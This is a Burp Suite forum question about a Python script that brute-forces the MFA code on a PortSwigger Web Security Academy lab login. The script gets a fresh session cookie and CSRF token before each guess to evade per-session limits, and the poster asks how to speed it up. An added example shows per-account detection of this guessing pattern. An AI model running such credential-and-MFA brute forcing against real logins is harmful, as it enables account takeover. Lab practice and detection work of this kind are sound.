The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

how to get values in responses such as set cookie session and csrf and use them as an attack

Muhammad | Last updated: Oct 17, 2024 10:50AM UTC

Hi, how to get values in responses such as Set-Cookie session and CSRF and use them as an attack?

```
import requests
from bs4 import BeautifulSoup
import time, random

sess = requests.Session()
payloads = ["{:04}".format(i) for i in range(10)]
random.shuffle(payloads)
headers = {
    "Sec-Ch-Ua": "\"Chromium\";v=\"129\", \"Not=A?Brand\";v=\"8\"",
    "Sec-Ch-Ua-Mobile": "?0",
    "Sec-Ch-Ua-Platform": "\"Linux\"",
    "Accept-Language": "en-US,en;q=0.9",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Sec-Fetch-Site": "none",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-User": "?1",
    "Sec-Fetch-Dest": "document",
    "Accept-Encoding": "gzip, deflate, br",
    "Priority": "u=0, i",
}

# get session token and csrf
login_url = "https://0af000b503b4e77b80be44a1006200e9.web-security-academy.net/login"
for mfa in payloads:
    res = sess.get(login_url)
    csrf = BeautifulSoup(res.text, 'lxml').find("input", {"name": "csrf"}).attrs['value']
    session = res.headers['Set-Cookie'].split("=")[1].split(';')[0]

    # log it in that session
    res = sess.post(login_url, cookies={"session": session}, headers=headers,
                    data={"username": "carlos", "password": "montoya", "csrf": csrf},
                    allow_redirects=False)
    validsession = res.headers['Set-Cookie'].split("=")[1].split(';')[0]
    res = sess.get(login_url+'2', cookies={"session": validsession}, headers=headers)
    mfacsrf = BeautifulSoup(res.text, 'lxml').find("input", {"name": "csrf"}).attrs['value']

    # fuzz the mfacode
    res = sess.post(login_url+'2', cookies={"session": validsession}, headers=headers,
                    data={"csrf": mfacsrf, "mfa-code": mfa})
    print("Incorrect security code" in res.text)
```

This is the code in Python for the exploit, but it is slow: 1 request in 2.2 seconds, and I want to do 10k, but I see no doc specifying how to use the response values (headers or HTML). Please, any help would be a blessing.
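
A defender-side view of the request pattern in the script above, as an added example that is not part of the original post: because each guess is made in a fresh session after a new password login, failed MFA codes have to be counted per account rather than per session. The event names, the `alice` account, the threshold and the log tuples are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def sample_events():
    """Constructed (timestamp, username, session_id, event) tuples; not real logs."""
    t0 = datetime(2024, 10, 17, 10, 0, 0)
    events = []
    # carlos: a new session and password login before every single wrong code
    for i in range(8):
        ts = t0 + timedelta(seconds=2 * i)
        events.append((ts, "carlos", f"s{i}", "password_ok"))
        events.append((ts + timedelta(seconds=1), "carlos", f"s{i}", "mfa_fail"))
    # alice: one mistyped code, then success, all in one session
    events.append((t0, "alice", "a1", "password_ok"))
    events.append((t0 + timedelta(seconds=5), "alice", "a1", "mfa_fail"))
    events.append((t0 + timedelta(seconds=9), "alice", "a1", "mfa_ok"))
    return sorted(events, key=lambda e: e[0])


def find_mfa_guessing(events, max_failures=5, window=timedelta(minutes=10)):
    """Return {username: (failures_in_window, distinct_sessions)} for flagged accounts.

    Failures are keyed on the account, not the session, so starting a fresh
    session before each guess does not reset the count.
    """
    recent = defaultdict(deque)  # username -> deque of (timestamp, session_id)
    flagged = {}
    for ts, user, session_id, event in events:
        if event != "mfa_fail":
            continue
        q = recent[user]
        q.append((ts, session_id))
        # drop failures that have aged out of the sliding window
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) > max_failures:
            flagged[user] = (len(q), len({s for _, s in q}))
    return flagged


if __name__ == "__main__":
    for user, (fails, sessions) in find_mfa_guessing(sample_events()).items():
        print(f"{user}: {fails} failed MFA codes across {sessions} sessions")
```

A high ratio of distinct sessions to failures is the signal that a session-scoped attempt limit is being reset between guesses.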
